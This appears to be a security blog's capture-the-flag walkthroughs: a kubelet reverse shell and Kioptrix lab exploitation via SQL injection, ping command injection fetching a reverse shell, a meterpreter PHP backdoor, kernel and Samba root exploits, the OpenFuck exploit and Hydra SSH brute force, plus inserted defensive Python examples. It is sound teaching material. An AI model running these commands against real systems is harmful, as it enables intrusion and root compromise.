(4/4): base/7/x86_64/primary_db | 5.7 MB 00:00:26
Determining fastest mirrors
* base: mirror.econdc.com
* extras: mirrors.coreix.net
* updates: mirror.econdc.com
Resolving Dependencies
--> Running transaction check
---> Package nmap-ncat.x86_64 2:6.40-7.el7 will be installed
--> Processing Dependency: libpcap.so.1()(64bit) for package: 2:nmap-ncat-6.40-7.el7.x86_64
--> Running transaction check
---> Package libpcap.x86_64 14:1.5.3-9.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
=================================================================================================================================================================
Package Arch Version Repository Size
=================================================================================================================================================================
Installing:
nmap-ncat x86_64 2:6.40-7.el7 base 201 k
Installing for dependencies:
libpcap x86_64 14:1.5.3-9.el7 base 138 k
Transaction Summary
=================================================================================================================================================================
Install 1 Package (+1 Dependent package)
Total download size: 338 k
Installed size: 731 k
Downloading packages:
warning: /var/cache/yum/x86_64/7/base/packages/nmap-ncat-6.40-7.el7.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
Public key for nmap-ncat-6.40-7.el7.x86_64.rpm is not installed
(1/2): nmap-ncat-6.40-7.el7.x86_64.rpm | 201 kB 00:00:00
(2/2): libpcap-1.5.3-9.el7.x86_64.rpm | 138 kB 00:00:04
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
Total 82 kB/s | 338 kB 00:00:04
Retrieving key from file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
Importing GPG key 0xF4A80EB5:
Userid : "CentOS-7 Key (CentOS 7 Official Signing Key) &lt;security@centos.org&gt;"
Fingerprint: 6341 ab27 53d7 8a78 a7c2 7bb1 24c6 a8a7 f4a8 0eb5
Package : centos-release-7-4.1708.el7.centos.x86_64 (@CentOS)
From : /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : 14:libpcap-1.5.3-9.el7.x86_64 1/2
Installing : 2:nmap-ncat-6.40-7.el7.x86_64 2/2
Verifying : 2:nmap-ncat-6.40-7.el7.x86_64 1/2
Verifying : 14:libpcap-1.5.3-9.el7.x86_64 2/2
Installed:
nmap-ncat.x86_64 2:6.40-7.el7
Dependency Installed:
libpcap.x86_64 14:1.5.3-9.el7
Complete!
</code>
</pre>
<br />
<br />
3) Prepare the reverse shell connection on your evil host (execute this on your evil container; you need to get its ip address so you can use it from the other container to connect to this one):<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@evil-ccb5dd4fc-tqf9s /]# ifconfig | grep inet | head -n1
inet 172.17.0.4 netmask 255.255.0.0 broadcast 0.0.0.0
[root@external-evil-host-78d68f7789-2dmvw ~]# nc -l -p 6666
</code>
</pre>
<br />
<br />
4) Now let's try to run a reverse shell and get shell access to the container<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo@poc-hack:~$ curl -sk \
https://192.168.99.100:10250/run/default/hacked-6565c4954f-wdj4x/hacked \
-d "cmd=nc -c /bin/sh 172.17.0.4 6666"
</code>
</pre>
<br />
<br />
<br />
5) Now go to the evil host and you should see the connection from the hacked box:<br />
<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
root@external-evil-host-78d68f7789-2dmvw ~]# nc -l -p 6666
id
uid=0(root) gid=0(root) groups=0(root)
</code>
</pre>
<br />
<br />
And that's it, you are inside, game over.<br />
<br />
<br />
Kioptrix Level 2 (2012-08-19)<br />
<center> <iframe width="560" height="315" src="http://www.youtube.com/embed/LPNrs7sqDB8" frameborder="0" allowfullscreen></iframe> </center>
Hi everyone, in this post I will explain how to get root on Kioptrix LEVEL 2.<br />
Let's start with the basics, nmap!<br />
<br />
<br />
Starting Nmap 6.01 ( <a href="http://nmap.org/">http://nmap.org</a> ) at 2012-08-13 10:30 BST<br />
Nmap scan report for 172.16.1.189<br />
Host is up (0.021s latency).<br />
Not shown: 994 closed ports<br />
PORT STATE SERVICE VERSION<br />
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)<br />
80/tcp open http Apache httpd 2.0.52 ((CentOS))<br />
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)<br />
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))<br />
631/tcp open ipp CUPS 1.1<br />
3306/tcp open mysql MySQL (unauthorized)<br />
MAC Address: 00:50:56:AF:62:3F (VMware)<br />
Ok, so for this one, let's try to access apache on that ip address. Open your browser and type the ip address of your kioptrix, in my case <a href="http://172.16.1.189/">http://172.16.1.189</a>. As you can see there is a login webpage; we don't know the user/password, but we can guess, OR try a sql injection. In my case I am doing the sql injection, so on the username field type : admin , and on the password field<br />
type : ' OR 1=1 -- -<br />
If you want to dig a bit more on the sql injection side of things, we can use sqlmap to fetch some information from the database. Here are some examples:<br />
1) Available databases :<br />
./sqlmap.py -u "<a href="http://172.16.1.189/">http://172.16.1.189</a>" --data "uname=admin&psw=xx' or OR 1=1 -- -" --dbs<br />
Result:<br />
available databases [2]:<br />
[*] `test\_%`<br />
[*] test<br />
2) Identify the current database<br />
./sqlmap.py -u "<a href="http://172.16.1.189/">http://172.16.1.189</a>" --data "uname=admin&psw=xx' or OR 1=1 -- -" --current-db<br />
Result :<br />
current database: 'webapp'<br />
3) Find all mysql users' passwords<br />
./sqlmap.py -u "<a href="http://172.16.1.189/">http://172.16.1.189</a>" --data "uname=admin&psw=xx' or OR 1=1 -- -" --passwords<br />
Result :<br />
[*] john [1]:<br />
password hash: 5a6914ba69e02807<br />
[*] root [1]:<br />
password hash: 5a6914ba69e02807<br />
And so on. You can also get a sql shell on the server if you want.<br />
./sqlmap.py -u "<a href="http://172.16.1.189/">http://172.16.1.189</a>" --data "uname=admin&psw=xx' or OR 1=1 -- -" --sql-shell<br />
>select * from users; [2]:<br />
[*] 1, 5afac8d85f, admin<br />
[*] 2, 66lajGGbla, john<br />
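Added example, not from the original post: why ' OR 1=1 -- - logs you in. The Python snippet below loads the two rows sqlmap dumped above into an in-memory SQLite database (a constructed stand-in for the MySQL backend; the table layout is assumed from the dump), then runs the login check once as a string-built query and once with bound parameters. The first returns the admin row for the payload; the second treats the payload as a literal password and finds nothing.<br />

```python
import sqlite3

# The two rows sqlmap dumped above, as (id, password, username).
USERS = [(1, "5afac8d85f", "admin"), (2, "66lajGGbla", "john")]
PAYLOAD = "' OR 1=1 -- -"


def make_db():
    """In-memory SQLite stand-in for the Kioptrix database (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, password TEXT, username TEXT)")
    conn.executemany("INSERT INTO users (id, password, username) VALUES (?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn, uname, psw):
    """String-built query: the password value is spliced straight into SQL, so
    the closing quote and the -- comment in the payload rewrite the WHERE clause
    to  username='admin' AND password='' OR 1=1  and every row matches."""
    query = f"SELECT username FROM users WHERE username='{uname}' AND password='{psw}'"
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn, uname, psw):
    """Bound parameters: the driver sends the payload as data, never as SQL text,
    so the only way in is the real password (which should itself be stored
    hashed rather than in the clear as the dump above shows)."""
    row = conn.execute("SELECT username FROM users WHERE username=? AND password=?",
                       (uname, psw)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", login_vulnerable(db, "admin", PAYLOAD))
    print("parameterized:", login_parameterized(db, "admin", PAYLOAD))
```

The same distinction is what sqlmap is probing for: its payloads only work against the string-built form, because a prepared statement never re-parses the submitted value as SQL.<br />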
<br />
Now, coming back to the browser, you can see a new web page saying that you can ping a machine on the network. That means we can execute commands and, if it is not properly configured, we can run more than just "ping". Let's try ping first, then we can try something else. If you typed your ip address in that box, you will be forwarded to <a href="http://172.16.1.189/pingit.php">http://172.16.1.189/pingit.php</a>. That's the one we need to look at now. So, instead of just ping, let's try to add something else to the command like "; cat /etc/passwd" and see what happens. As you can see, we can read /etc/passwd, which means we have a webshell to<br />
the server and now we can execute anything (almost ;) ), so let's upload our backdoor to the server.<br />
We can do this in many ways; I will be explaining 2 methods:<br />
1) Upload a reverse shell (the easiest way)<br />
172.16.1.1 ; wget -O /tmp/reverse_shell <br />
<a href="http://172.16.1.79/exploits/reverse_shell2">http://172.16.1.79/exploits/reverse_shell2</a><br />
2) Change permission to execute.<br />
172.16.1.1 ; chmod 777 /tmp/reverse_shell <br />
3) Prepare your BT server for the connection<br />
nc -l -p 10000<br />
4) And now run the reverse_shell<br />
172.16.1.1 ; /tmp/reverse_shell <br />
Done, now we have a shell. We can try the same using backtrack.<br />
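Added example, not from the original post: the pingit.php behaviour above is classic command injection, and it is worth seeing why the fix is not "filter semicolons". The Python snippet below writes the same ping feature three ways (raw concatenation as on Kioptrix, escapeshellarg-style quoting via shlex.quote, and no shell at all with an IP-validated argv list) and uses shlex to count how many commands a POSIX shell would run for each resulting string. Nothing is executed and the inputs are constructed; ping is never invoked.<br />

```python
import ipaddress
import shlex

# Constructed inputs: a plain address and the payload described above.
BENIGN = "172.16.1.1"
INJECTED = "172.16.1.1 ; cat /etc/passwd"


def vulnerable_command_line(target):
    """How pingit.php behaves: the form value is pasted into a shell string."""
    return "ping -c 1 " + target


def escaped_command_line(target):
    """Quoting the value (PHP's escapeshellarg; shlex.quote here) makes the shell
    treat the whole thing as one argument, so ping gets it and fails harmlessly."""
    return "ping -c 1 " + shlex.quote(target)


def safe_ping_argv(target):
    """Validate the input as an IP address and build an argv list for
    subprocess.run(argv) without a shell: there is no command line to inject into
    and anything that is not an address is rejected with ValueError."""
    ip = ipaddress.ip_address(target.strip())
    return ["ping", "-c", "1", str(ip)]


def shell_command_count(line):
    """Count the commands a POSIX shell would run for `line` by tokenising it the
    way the shell does and counting control operators found outside quotes."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    return 1 + sum(1 for tok in lexer if tok in (";", "&&", "||", "|"))


if __name__ == "__main__":
    for label, line in (("raw", vulnerable_command_line(INJECTED)),
                        ("quoted", escaped_command_line(INJECTED))):
        print(f"{label:7}: {line!r} -> {shell_command_count(line)} command(s)")
    print("argv   :", safe_ping_argv(BENIGN))
    try:
        safe_ping_argv(INJECTED)
    except ValueError as err:
        print("rejected:", err)
```

Quoting closes the door the payload above walks through, but validation plus a shell-free argv is the form to ship: it also removes the other shell metacharacters and, because the value must parse as an address, leaves nothing for the attacker to tune.<br />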
1) We need to start apache : /etc/init.d/apache2 start<br />
2) We need to create our backdoor: <br />
LHOST : IP of your backtrack<br />
LPORT : Port that backtrack will be listening to<br />
/var/www/backdoor.php.txt : That's where it will save your backdoor.<br />
So the complete command is :<br />
msfpayload php/meterpreter/reverse_tcp LHOST=172.16.1.79 LPORT=8080 R > <br />
/var/www/backdoor.php.txt<br />
<br />
Now, we need to start our session handler.<br />
<br />
msfconsole<br />
use multi/handler <br />
search php <br />
set PAYLOAD php/meterpreter/reverse_tcp <br />
set LHOST 0.0.0.0 <br />
set LPORT 8080 <br />
exploit -j -z <br />
Leave this one running and open another shell on your Backtrack.<br />
We need to edit our backdoor.php.txt (script kiddie stuff):<br />
vi /var/www/backdoor.php.txt, remove the "#" from the first line and save it.<br />
<br />
The next step is to insert this in our ping command line:<br />
172.16.1.1 ; cd /tmp ; wget -O backdoor.php 172.16.1.79/backdoor.php.txt ; php -f backdoor.php<br />
If you look at the other shell, you should see something like this by now:<br />
[*] Sending stage (39217 bytes) to 172.16.1.189<br />
[*] Meterpreter session 4 opened (172.16.1.79:8080 -> 172.16.1.189:32807) at 2012-08-13 14:12:00 +0100<br />
meterpreter ><br />
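The hardened shape of a "ping a host" handler like pingit.php, added here as an example (not code from the original post or from the Kioptrix image): the naive handler only builds the shell string so it can be inspected, while the safe one allow-lists a single IP address and passes an argv list with no shell involved. The sample inputs are constructed from the injection strings used above.

```python
"""Hardened replacement for the kind of 'ping a host' handler behind pingit.php.

Added example, not code from the original post or from the Kioptrix VM.
vulnerable_command() only builds (never runs) the shell string a naive handler
would execute; safe_ping_argv() is the defender's version.
"""
import ipaddress
import subprocess
from typing import Optional

# Constructed inputs: the intended use, the two injections from the post, and
# a hostname to show that only bare addresses pass the allow-list.
SAMPLE_INPUTS = [
    "172.16.1.1",
    "172.16.1.1 ; cat /etc/passwd",
    "172.16.1.1 ; /tmp/reverse_shell",
    "localhost",
]


def vulnerable_command(user_input: str) -> str:
    """The bug: user text is spliced into a shell command line.

    Anything the shell treats specially (';', '&&', '|', '$(...)') becomes a
    second command. Returned as a string here so it can be inspected safely.
    """
    return "ping -c 3 " + user_input


def validate_target(user_input: str) -> Optional[str]:
    """Allow-list the *shape* of the input: exactly one IPv4/IPv6 address.

    Rejecting the input unless it parses as an address defeats every shell
    separator at once, unlike a deny-list of ';' and '|' that is easy to miss.
    """
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        return None


def safe_ping_argv(user_input: str, count: int = 3) -> list[str]:
    """Build ping's argv as a list; with no shell involved, metacharacters are inert."""
    target = validate_target(user_input)
    if target is None:
        raise ValueError("target must be a single IP address")
    # A validated address never starts with '-', so it cannot be read as an option.
    return ["ping", "-c", str(count), target]


def run_ping(user_input: str, count: int = 3) -> int:
    """Execute the hardened command (shell=False); returns ping's exit status."""
    return subprocess.run(safe_ping_argv(user_input, count), check=False).returncode


def classify_samples() -> dict[str, bool]:
    """Map each sample input to whether the hardened handler would accept it."""
    return {s: validate_target(s) is not None for s in SAMPLE_INPUTS}


if __name__ == "__main__":
    for s, ok in classify_samples().items():
        verdict = "accepted" if ok else "REJECTED"
        print(f"{verdict:9} {s!r}  (naive handler would run: {vulnerable_command(s)!r})")
```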
Great, now that we have access to the box, we need to get root.<br />
uname -a<br />
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux<br />
<br />
Now we need to find an exploit for that kernel. If you google it, you will end up on SecurityFocus or similar sites. You can download the exploit from SecurityFocus or exploit-db, or use the one that ships with Backtrack.<br />
<a href="http://www.exploit-db.com/exploits/9542/">http://www.exploit-db.com/exploits/9542/</a><br />
<a href="http://www.securityfocus.com/bid/36108/info">http://www.securityfocus.com/bid/36108/info</a><br />
<br />
Or ... you can search inside backtrack.<br />
/pentest/exploits/exploitdb/searchsploit kernel linux local<br />
And that's the one you are looking for <br />
Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit /linux/local/9435.txt<br />
Again, you can try other exploits as well. Now that you have the exploit, compile it and run it on the target machine.<br />
wget http://172.16.1.79/exploits/ip_append_data.c<br />
gcc -o get_root ip_append_data.c<br />
./get_root<br />
sh: no job control in this shell<br />
sh-3.00# id<br />
uid=0(root) gid=0(root) groups=48(apache)<br />
<br />
And that's it, game over.<br />
<br />
Kioptrix Hacking challenge LEVEL 1 part 3 (SSH) - Angelo, 2012-08-12<br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/L8kjoBfhkAo" frameborder="0" allowfullscreen></iframe>
<br>
Hi folks, ok, another option we have to break into Kioptrix level 1 is brute-forcing SSH. It's quite simple, but takes a LOT of time if you are unlucky. Here is how you can crack it via brute force.<br />
In your backtrack type:<br />
cd /pentest/passwords/wordlists/<br />
hydra -l root -P rockyou.txt -t 3 -o login.pwd 172.16.1.144 ssh<br />
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only<br />
Hydra (<a href="http://www.thc.org/thc-hydra">http://www.thc.org/thc-hydra</a>) starting at 2012-08-08 13:33:19<br />
[DATA] 3 tasks, 1 server, 14344398 login tries (l:1/p:14344398), ~4781466 tries per task<br />
[DATA] attacking service ssh on port 22<br />
[22][ssh] host: 172.16.1.144 login: root password: 123456<br />
[STATUS] attack finished for 172.16.1.144 (waiting for children to finish)<br />
1 of 1 target successfuly completed, 1 valid password found<br />
Hydra (<a href="http://www.thc.org/thc-hydra">http://www.thc.org/thc-hydra</a>) finished at 2012-08-08 13:33:36<br />
<br />
<br />
As you can see, it found the password 123456 for the user root.<br />
<br />
PS : I changed the root password to 123456 for this demonstration only.<br />
<br />
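What the Hydra run above looks like from the server side, as an added example that is not part of the original post: a small detector over sshd log lines that flags a source reaching a burst of failures and, more seriously, a later success from that same source. The log lines are constructed in OpenSSH syslog format, and the year, threshold and window are assumptions to tune.

```python
"""Detect an SSH password brute-force (like the Hydra run above) from sshd log lines.

Added example, not part of the original post. The log lines are constructed in
OpenSSH syslog format; the thresholds and the year are assumptions a defender
would tune for their own environment.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of /var/log/secure (or auth.log) while Hydra hammers root
# with three parallel tasks (-t 3) and finally lands the password, followed by
# an ordinary user who mistypes once. Hostname and PIDs are made up.
SAMPLE_LOG = """\
Aug  8 13:33:19 kioptrix sshd[1201]: Failed password for root from 172.16.1.79 port 51001 ssh2
Aug  8 13:33:19 kioptrix sshd[1202]: Failed password for root from 172.16.1.79 port 51002 ssh2
Aug  8 13:33:20 kioptrix sshd[1203]: Failed password for root from 172.16.1.79 port 51003 ssh2
Aug  8 13:33:21 kioptrix sshd[1204]: Failed password for invalid user admin from 172.16.1.79 port 51004 ssh2
Aug  8 13:33:22 kioptrix sshd[1205]: Failed password for root from 172.16.1.79 port 51005 ssh2
Aug  8 13:33:23 kioptrix sshd[1206]: Failed password for root from 172.16.1.79 port 51006 ssh2
Aug  8 13:33:36 kioptrix sshd[1240]: Accepted password for root from 172.16.1.79 port 51042 ssh2
Aug  8 13:40:02 kioptrix sshd[1301]: Failed password for john from 172.16.1.50 port 40001 ssh2
Aug  8 13:40:10 kioptrix sshd[1302]: Accepted password for john from 172.16.1.50 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[0-9a-fA-F.:]+) port \d+"
)


def parse_line(line: str, year: int = 2012):
    """Parse one sshd auth line into a dict, or None for lines we do not care about."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; the caller supplies it (assumed 2012 here)
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(lines, threshold: int = 5, window_seconds: int = 60):
    """Sliding-window failure counter per source IP.

    Emits a 'medium' alert when a source reaches `threshold` failures inside
    `window_seconds`, and a 'high' alert when that same source later logs in
    successfully: the signature of a guessed password.
    """
    recent_failures = defaultdict(deque)   # ip -> timestamps of failures in window
    failed_users = defaultdict(set)        # ip -> usernames tried
    flagged = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        window = recent_failures[ip]
        if ev["result"] == "Failed":
            window.append(ts)
            failed_users[ip].add(ev["user"])
            while window and (ts - window[0]).total_seconds() > window_seconds:
                window.popleft()
            if len(window) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({
                    "severity": "medium", "ip": ip, "at": ts,
                    "reason": f"{len(window)} failed logins within {window_seconds}s",
                    "users": sorted(failed_users[ip]),
                })
        else:
            if ip in flagged:
                alerts.append({
                    "severity": "high", "ip": ip, "at": ts, "user": ev["user"],
                    "reason": "successful login after brute-force pattern",
                })
            window.clear()   # one success ends the current guessing run
    return alerts


def run_sample():
    """Run the detector over the constructed log; returns the alert list."""
    return detect_bruteforce(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for a in run_sample():
        print(f"[{a['severity']:6}] {a['at']:%H:%M:%S} {a['ip']}: {a['reason']}")
```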
<br />
Kioptrix Hacking challenge LEVEL 1 part 2 (SAMBA) - Angelo, 2012-08-12<br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/tPeRiGBQu_w" frameborder="0" allowfullscreen></iframe>
<br>
Kioptrix Hacking challenge LEVEL 1 part 2 (SAMBA)<br />
Hi everyone, this is the second part of level 1; now we are going to exploit Samba. As you remember from the last video, we managed to get root using an SSL exploit for Apache; now it's time to exploit a Samba vulnerability. So, let's start.<br />
First, let's run nmap:<br />
nmap -sV 172.16.1.144<br />
Starting Nmap 6.01 ( <a href="http://nmap.org/">http://nmap.org</a> ) at 2012-08-07 11:12 BST<br />
Nmap scan report for 172.16.1.144<br />
Host is up (0.00068s latency).<br />
PORT STATE SERVICE VERSION<br />
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)<br />
MAC Address: 00:50:56:AF:5A:B9 (VMware)<br />
Ok, this output doesn't tell the version of Samba, but we can try two commands to list the version:<br />
1) smbclient -L 172.16.1.144<br />
Result :<br />
Enter root's password:<br />
Anonymous login successful<br />
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]<br />
Sharename Type Comment<br />
--------- ---- -------<br />
cli_rpc_pipe_open_noauth: rpc_pipe_bind for pipe \srvsvc failed with error ERRnosupport<br />
IPC$ IPC IPC Service (Samba Server)<br />
ADMIN$ Disk IPC Service (Samba Server)<br />
Anonymous login successful<br />
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]<br />
<br />
2) smbclient //172.16.1.144/IPC$<br />
Result:<br />
Enter root's password:<br />
Anonymous login successful<br />
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]<br />
tree connect failed: ERRnosuchshare<br />
Ok, now we know it's running version 2.2.1a, let's try to find an exploit for it. If you google for "samba 2.2.1a exploit",<br />
you will find this one:<br />
<a href="http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c">http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c</a><br />
So.. let's go back to our Backtrack, download and compile it.<br />
wget http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c<br />
gcc -o exploit 0x333hate.c<br />
./exploit -t 172.16.1.144<br />
Result :<br />
[~] 0x333hate => samba 2.2.x remote root exploit [~]<br />
[~] coded by c0wboy ~ <a href="http://www.0x333.org/">www.0x333.org</a> [~]<br />
[-] connecting to 172.16.1.144:139<br />
[-] stating bruteforce<br />
[-] testing 0xbfffffff<br />
[-] testing 0xbffffdff<br />
[-] testing 0xbffffbff<br />
[-] testing 0xbffff9ff<br />
[-] testing 0xbffff7ff<br />
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown<br />
uid=0(root) gid=0(root) groups=99(nobody)<br />
<br />
<br />
There is another way to exploit this Samba version, using Metasploit. Let's try that.<br />
msfconsole<br />
search samba<br />
use linux/samba/trans2open<br />
show options<br />
set RHOST 172.16.1.144<br />
show payloads<br />
set PAYLOAD linux/x86/shell/bind_tcp<br />
show options<br />
exploit<br />
[*] Started bind handler<br />
[*] Trying return address 0xbffffdfc...<br />
[*] Trying return address 0xbffffcfc...<br />
[*] Trying return address 0xbffffbfc...<br />
[*] Trying return address 0xbffffafc...<br />
[*] Sending stage (36 bytes) to 172.16.1.144<br />
[*] Trying return address 0xbffff9fc...<br />
[*] Command shell session 1 opened (172.16.1.79:52832 -> 172.16.1.144:4444) at 2012-08-07 11:51:46 +0100<br />
id<br />
uid=0(root) gid=0(root) groups=99(nobody)<br />
<br />
<br />
Success!! We got onto the box again.<br />
<br />
Kioptrix Hacking challenge LEVEL 1 part 1 (APACHE) - Angelo, 2012-08-12<br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/C2mubyfc7ns" frameborder="0" allowfullscreen></iframe>
<br />
<br />
Kioptrix Hacking challenge LEVEL 1 part 1 (APACHE)<br />
Hi everyone, in this post I will be demonstrating how to hack Kioptrix Level 1. But what is Kioptrix? It's a Linux distro with lots of vulnerabilities, so we can play with it and test our knowledge. To download it, go to: <a href="http://www.kioptrix.com/blog/?page_id=135">http://www.kioptrix.com/blog/?page_id=135</a>, use VMware Player to open the files and you are ready to go. Now that everything is up and running, we need to discover the IP address of the target machine, because it gets one via DHCP from your network (by the way, you need a DHCP server for this to work). To find out the IP address, let's run an nmap scan of our network that looks for live hosts.<br />
<br />
# nmap -sn 172.16.1.0/24<br />
Nmap scan report for 172.16.1.144<br />
Host is up (0.0010s latency).<br />
MAC Address: 00:50:56:AF:5A:B9 (VMware)<br />
<br />
Great, now that we have found the IP address, let's see what's running on the host.<br />
<br />
# nmap -sV 172.16.1.144<br />
<br />
<br />
Starting Nmap 6.01 ( <a href="http://nmap.org/">http://nmap.org</a> ) at 2012-08-03 16:47 BST<br />
Nmap scan report for 172.16.1.144<br />
Host is up (0.033s latency).<br />
Not shown: 994 closed ports<br />
PORT STATE SERVICE VERSION<br />
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)<br />
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)<br />
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)<br />
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)<br />
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)<br />
1024/tcp open status (status V1) 1 (rpc #100024)<br />
MAC Address: 00:50:56:AF:5A:B9 (VMware)<br />
<br />
<br />
Ok, at this point there is a lot to do. We need to find out whether the version running on each open port has a known exploit. To get the proper version and vulnerability ID, let's use nikto to scan the host. I am not going to explain all the vulnerabilities of the distro; I think two are good enough, and you guys can try other ways to break in yourselves. So I am going to show how to break in using Apache and Samba.<br />
1) cd /pentest/web/nikto/<br />
2) ./nikto.pl -host 172.16.1.144<br />
3) The results (the interesting bits):<br />
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b<br />
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.<br />
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.<br />
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.<br />
<br />
<br />
Right, now we need to google the CVEs, or you can search for the exploit in Backtrack itself.<br />
Run:<br />
/pentest/exploits/exploitdb/searchsploit apache linux remote<br />
Webfroot Shoutbox < 2.32 (Apache) Remote Exploit /linux/remote/34.pl<br />
Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl /linux/remote/38.pl<br />
Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit /linux/remote/126.c<br />
Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit /linux/remote/132.c<br />
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)/linux/remote/764.c<br />
Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield) /linux/remote/4162.c<br />
Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support) /linux/remote/4552.pl<br />
Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit /linux/remote/5386.txt<br />
<br />
<br />
As you can see, there is one for OpenSSL: 764.c (OpenFuck).<br />
Now, because this is really old, you need to change the exploit a bit in order to make it work.<br />
1) Add: #include <openssl/rc4.h><br />
2) Add: #include <openssl/md5.h><br />
3) Search inside the exploit for "wget" and change the URL to the correct one, because the original is not valid anymore. If you google for ptrace-kmod.c, you will find that the correct address is:<br />
<a href="http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c">http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c</a><br />
So, just change that in the exploit and save it.<br />
Now we need to compile it, but before that, we need to install the SSL development libraries.<br />
Run : <br />
apt-get install libssl-dev<br />
cd /pentest/exploits/exploitdb/platforms/linux/remote<br />
gcc -o OpenFuck 764.c -lcrypto<br />
Run the exploit now<br />
./OpenFuck <br />
Look for the target; we know it's running Apache 1.3.20 on Red Hat, so let's filter for that:<br />
./OpenFuck | grep -i redhat | grep "1.3.20"<br />
That limits the results to only two:<br />
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1<br />
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2<br />
So we first try target 0x6a, and if that doesn't work, we can try 0x6b.<br />
./OpenFuck 0x6a 172.16.1.144 443<br />
Result :<br />
Establishing SSL connection<br />
cipher: 0x4043808c ciphers: 0x80fc3f0<br />
Ready to send shellcode<br />
Spawning shell...<br />
Good Bye!<br />
<br />
As you can see, that did not work.<br />
Let's try the other one now.<br />
./OpenFuck 0x6b 172.16.1.144 443<br />
Result:<br />
Establishing SSL connection<br />
cipher: 0x4043808c ciphers: 0x80f83c0<br />
Ready to send shellcode<br />
Spawning shell...<br />
bash: no job control in this shell<br />
bash-2.05$ wget http://172.16.1.79/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;<br />
--09:18:29-- <a href="http://172.16.1.79/ptrace-kmod.c">http://172.16.1.79/ptrace-kmod.c</a> => `ptrace-kmod.c'<br />
Connecting to 172.16.1.79:80... connected!<br />
HTTP request sent, awaiting response... 200 OK<br />
Length: 3,921 [text/x-csrc] 0K ... 100% @ 3.74 MB/s<br />
